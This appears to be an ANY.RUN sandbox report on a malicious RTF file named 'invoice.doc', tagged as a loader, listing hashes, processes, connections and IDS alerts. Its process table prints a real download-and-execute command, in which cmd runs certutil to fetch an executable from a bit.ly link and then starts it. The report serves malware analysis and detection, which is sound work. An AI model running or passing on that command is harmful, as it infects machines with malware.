analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

invoice.doc

Full analysis: https://app.any.run/tasks/8b76f303-71d0-4c2b-8697-16fd3d54b00e
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: July 11, 2019, 22:05:22
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
loader
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

B1D48A8E5AA07F5D85C278410ABF79C5

SHA1:

56EFE973554A17AB1890BFF75892AAF6D58FA5AA

SHA256:

3F01D5E66E5E0C20237FD0085CA47822A573896C22E025F601123842AFCEBE15

SSDEEP:

1536:VBsGXysETsy4LArDY7ojC+dRxo8EOViOg/wU42xuZXysETsy4LArDY7ojC+dRxoz:Vl3c8Y5c8Y5c8Y5c8YfU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2388)
      • EXCEL.EXE (PID: 2304)
      • EXCEL.EXE (PID: 3648)
      • EXCEL.EXE (PID: 2980)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2388)
      • EXCEL.EXE (PID: 2304)
      • EXCEL.EXE (PID: 3648)
      • EXCEL.EXE (PID: 2980)
    • Starts CertUtil for downloading files

      • cmd.exe (PID: 3776)
      • cmd.exe (PID: 2884)
      • cmd.exe (PID: 968)
      • cmd.exe (PID: 3896)
  • SUSPICIOUS

    • Executed via COM

      • EXCEL.EXE (PID: 2388)
      • EXCEL.EXE (PID: 2304)
      • EXCEL.EXE (PID: 3648)
      • EXCEL.EXE (PID: 2980)
      • excelcnv.exe (PID: 3080)
    • Creates files in the user directory

      • certutil.exe (PID: 3384)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3268)
      • WINWORD.EXE (PID: 3608)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2388)
      • WINWORD.EXE (PID: 3268)
      • EXCEL.EXE (PID: 2304)
      • EXCEL.EXE (PID: 3648)
      • EXCEL.EXE (PID: 2980)
      • excelcnv.exe (PID: 3080)
      • WINWORD.EXE (PID: 3608)
      • WINWORD.EXE (PID: 3332)
    • Manual execution by user

      • WINWORD.EXE (PID: 3608)
      • WINWORD.EXE (PID: 3332)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 85
CharactersWithSpaces: 460
Characters: 393
Words: 68
Pages: 5
TotalEditTime: 1 minute
RevisionNumber: 2
ModifyDate: 2019:02:12 18:12:00
CreateDate: 2019:02:12 18:12:00
LastModifiedBy: Windows User
Author: Windows User
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
16
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs excel.exe no specs cmd.exe no specs certutil.exe excel.exe no specs cmd.exe no specs certutil.exe excel.exe no specs cmd.exe no specs certutil.exe excel.exe no specs cmd.exe no specs certutil.exe excelcnv.exe no specs winword.exe no specs winword.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3268"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\invoice.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2388"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
3776cmd.exe /ccertutil -urlcache -split -f http://bit.ly/30xnuAq 0989434.exe& 0989434.exeC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3584certutil -urlcache -split -f http://bit.ly/30xnuAq 0989434.exeC:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147954557
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2304"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2884cmd.exe /ccertutil -urlcache -split -f http://bit.ly/30xnuAq 0989434.exe& 0989434.exeC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3384certutil -urlcache -split -f http://bit.ly/30xnuAq 0989434.exeC:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147954557
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3648"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
968cmd.exe /ccertutil -urlcache -split -f http://bit.ly/30xnuAq 0989434.exe& 0989434.exeC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3720certutil -urlcache -split -f http://bit.ly/30xnuAq 0989434.exeC:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147954557
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 719
Read events
2 610
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
7
Unknown types
12

Dropped files

PID
Process
Filename
Type
3268WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD97D.tmp.cvr
MD5:
SHA256:
2388EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE295.tmp.cvr
MD5:
SHA256:
2304EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE813.tmp.cvr
MD5:
SHA256:
3648EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVREB30.tmp.cvr
MD5:
SHA256:
2980EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVREE0F.tmp.cvr
MD5:
SHA256:
3080excelcnv.exeC:\Users\admin\AppData\Local\Temp\CVRF274.tmp.cvr
MD5:
SHA256:
3080excelcnv.exeC:\Users\admin\AppData\Local\Temp\~DF60C65D3FFAD5CA4F.TMP
MD5:
SHA256:
3268WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF0EC2F9414C5EB653.TMP
MD5:
SHA256:
3080excelcnv.exeC:\Users\admin\AppData\Local\Temp\~DF1E7E27D63503D663.TMP
MD5:
SHA256:
3268WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFA9DD1EFEB90A2554.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
32
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3384
certutil.exe
GET
301
67.199.248.11:80
http://bit.ly/30xnuAq
US
html
128 b
shared
920
certutil.exe
GET
301
67.199.248.11:80
http://bit.ly/30xnuAq
US
html
128 b
shared
3384
certutil.exe
GET
301
67.199.248.11:80
http://bit.ly/30xnuAq
US
html
128 b
shared
3584
certutil.exe
GET
301
67.199.248.11:80
http://bit.ly/30xnuAq
US
html
128 b
shared
3720
certutil.exe
GET
301
67.199.248.11:80
http://bit.ly/30xnuAq
US
html
128 b
shared
920
certutil.exe
GET
301
67.199.248.11:80
http://bit.ly/30xnuAq
US
html
128 b
shared
3720
certutil.exe
GET
301
67.199.248.11:80
http://bit.ly/30xnuAq
US
html
128 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3584
certutil.exe
67.199.248.11:80
bit.ly
Bitly Inc
US
shared
3384
certutil.exe
67.199.248.11:80
bit.ly
Bitly Inc
US
shared
3720
certutil.exe
67.199.248.11:80
bit.ly
Bitly Inc
US
shared
3384
certutil.exe
23.99.183.149:443
compute-1.azurewebsites.net
Microsoft Corporation
US
suspicious
920
certutil.exe
23.99.183.149:443
compute-1.azurewebsites.net
Microsoft Corporation
US
suspicious
3720
certutil.exe
23.99.183.149:443
compute-1.azurewebsites.net
Microsoft Corporation
US
suspicious
920
certutil.exe
67.199.248.11:80
bit.ly
Bitly Inc
US
shared
3584
certutil.exe
23.99.183.149:443
compute-1.azurewebsites.net
Microsoft Corporation
US
suspicious

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.11
  • 67.199.248.10
shared
compute-1.azurewebsites.net
  • 23.99.183.149
malicious

Threats

PID
Process
Class
Message
3384
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
3720
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
920
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
3584
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
4 ETPRO signatures available at the full report
No debug info